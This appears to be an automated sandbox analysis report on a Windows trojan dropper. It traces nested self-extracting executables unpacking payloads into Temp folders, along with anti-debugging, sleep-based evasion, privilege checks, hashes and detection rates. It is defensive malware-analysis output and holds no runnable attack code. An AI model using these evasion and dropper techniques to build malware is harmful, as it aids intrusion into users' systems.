Source: pYHrqNhFKr.exe, 00000000.00000003.241408245.000000000300D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWearing.exe< vs pYHrqNhFKr.exe
Source: pYHrqNhFKr.exe, 00000000.00000003.241248149.0000000004BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs pYHrqNhFKr.exe
Source: pYHrqNhFKr.exe, 00000000.00000003.241248149.0000000004BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWearing.exe< vs pYHrqNhFKr.exe
Source: pYHrqNhFKr.exe	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs pYHrqNhFKr.exe

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe B182F2D3D49BDDA2E29A0ED312DEEF4BEE03983DE54080C5E97AD6422DE192D2

Source: imYkV36.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: h99af07.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: pYHrqNhFKr.exe	ReversingLabs: Detection: 69%
Source: pYHrqNhFKr.exe	Virustotal: Detection: 50%

Source: pYHrqNhFKr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\pYHrqNhFKr.exe C:\Users\user\Desktop\pYHrqNhFKr.exe
Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Jump to behavior

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Code function: 0_2_008A1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	0_2_008A1F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Code function: 1_2_00071F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	1_2_00071F90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Code function: 2_2_01251F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	2_2_01251F90

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\f7051zI.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/8@0/0

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe

Code function: 0_2_008A597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

0_2_008A597D

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe

Code function: 0_2_008A3FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,

0_2_008A3FEF

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe

Code function: 3_2_00007FFC9DD11B10 ChangeServiceConfigA,

3_2_00007FFC9DD11B10

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

Code function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

5_2_004019F0

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe

Code function: 0_2_008A4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,

0_2_008A4FE0

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Command line argument: Kernel32.dll	0_2_008A2BFB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Command line argument: Kernel32.dll	1_2_00072BFB
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Command line argument: Kernel32.dll	2_2_01252BFB
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Command line argument: 08A	5_2_00413780

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Automated click: OK

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: pYHrqNhFKr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: pYHrqNhFKr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: pYHrqNhFKr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: pYHrqNhFKr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: pYHrqNhFKr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: pYHrqNhFKr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: pYHrqNhFKr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: pYHrqNhFKr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: pYHrqNhFKr.exe, niba6073.exe.0.dr, niba2214.exe.1.dr
Source:	Binary string: Healer.pdb source: h99af07.exe, 00000005.00000003.281384842.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.307743738.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.308257566.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, h99af07.exe, 00000005.00000002.307495557.0000000004750000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.307402577.0000000004640000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: pYHrqNhFKr.exe, niba6073.exe.0.dr, niba2214.exe.1.dr
Source:	Binary string: <C:\zarepot\talotoyuy1\guf.pdb source: niba6073.exe, 00000001.00000003.242966738.0000000004521000.00000004.00000020.00020000.00000000.sdmp, imYkV36.exe.1.dr
Source:	Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: niba2214.exe, 00000002.00000003.243954252.0000000004A0C000.00000004.00000020.00020000.00000000.sdmp, f7051zI.exe, 00000003.00000000.244138101.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, f7051zI.exe.2.dr
Source:	Binary string: C:\tugiwozexe-hon68\xozutuboreja.pdb source: niba2214.exe, 00000002.00000003.243954252.0000000004A0C000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000000.269895289.0000000000401000.00000020.00000001.01000000.00000009.sdmp, h99af07.exe.2.dr
Source:	Binary string: _.pdb source: h99af07.exe, 00000005.00000003.281384842.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.307743738.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, h99af07.exe, 00000005.00000003.283921128.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.307495557.0000000004750000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.307402577.0000000004640000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\zarepot\talotoyuy1\guf.pdb source: niba6073.exe, 00000001.00000003.242966738.0000000004521000.00000004.00000020.00020000.00000000.sdmp, imYkV36.exe.1.dr
Source:	Binary string: Healer.pdbH5 source: h99af07.exe, 00000005.00000003.281384842.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.307743738.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.308257566.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, h99af07.exe, 00000005.00000002.307495557.0000000004750000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.307402577.0000000004640000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

Unpacked PE file: 5.2.h99af07.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

Unpacked PE file: 5.2.h99af07.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Code function: 0_2_008A724D push ecx; ret	0_2_008A7260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Code function: 1_2_0007724D push ecx; ret	1_2_00077260
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Code function: 2_2_0125724D push ecx; ret	2_2_01257260
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_0041C40C push cs; iretd	5_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_00423149 push eax; ret	5_2_00423179
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_0041C50E push cs; iretd	5_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_00422D28 push ss; ret	5_2_00422D3A
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_004231C8 push eax; ret	5_2_00423179
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_0040E21D push ecx; ret	5_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_0041C6BE push ebx; ret	5_2_0041C6BF
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_02E9C693 push edi; retf	5_2_02E9C694
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_02E99748 push FFFFFFE1h; ret	5_2_02E99757
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_045E454E push ecx; retf	5_2_045E4554
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_045E4139 push edi; iretd	5_2_045E414E

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe

Code function: 0_2_008A2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

0_2_008A2F1D

Source: l64fQ59.exe.0.dr

Static PE information: 0xD1DEA1A2 [Tue Jul 29 15:28:34 2081 UTC]

Source: initial sample	Static PE information: section name: .text entropy: 7.842085736950787
Source: initial sample	Static PE information: section name: .text entropy: 7.7554731967823

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\imYkV36.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Jump to dropped file
Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Jump to dropped file

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Code function: 0_2_008A1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	0_2_008A1AE8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Code function: 1_2_00071AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	1_2_00071AE8
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Code function: 2_2_01251AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	2_2_01251AE8

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe TID: 5184	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe TID: 2512	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

5_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\imYkV36.exe			Jump to dropped file
Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_0-2575
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_1-2575
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_2-2456

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe

Code function: 0_2_008A5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

0_2_008A5467

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Code function: 0_2_008A2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_008A2390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Code function: 1_2_00072390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_00072390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Code function: 2_2_01252390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	2_2_01252390

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

Code function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

5_2_0040CE09

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

5_2_004019F0

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe

Code function: 0_2_008A2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

0_2_008A2F1D

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

Code function: 5_2_0040ADB0 GetProcessHeap,HeapFree,

5_2_0040ADB0

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

Code function: 5_2_02E97C33 push dword ptr fs:[00000030h]

5_2_02E97C33

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Code function: 0_2_008A6F40 SetUnhandledExceptionFilter,	0_2_008A6F40
Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Code function: 0_2_008A6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_008A6CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Code function: 1_2_00076F40 SetUnhandledExceptionFilter,	1_2_00076F40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Code function: 1_2_00076CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00076CF0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Code function: 2_2_01256F40 SetUnhandledExceptionFilter,	2_2_01256F40
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Code function: 2_2_01256CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_01256CF0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_004123F1 SetUnhandledExceptionFilter,	5_2_004123F1

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe

Code function: 0_2_008A18A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,

0_2_008A18A3

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

Code function: GetLocaleInfoA,

5_2_00417A20

